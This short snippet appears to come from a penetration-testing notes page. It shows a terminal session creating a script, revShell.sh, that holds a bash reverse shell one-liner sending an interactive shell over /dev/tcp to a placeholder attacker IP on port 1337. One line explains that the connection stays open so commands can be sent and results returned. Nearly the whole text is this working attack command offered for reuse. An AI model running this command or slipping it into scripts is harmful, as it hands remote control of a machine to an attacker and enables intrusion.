root@oco:~$ nano revShell.sh #!/bin/bash bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1 * this is an interactive shell where it keeps the connection open, allowing for multiple commands to be sent and results to be returned in a more dynamic way
Last updated 2 months ago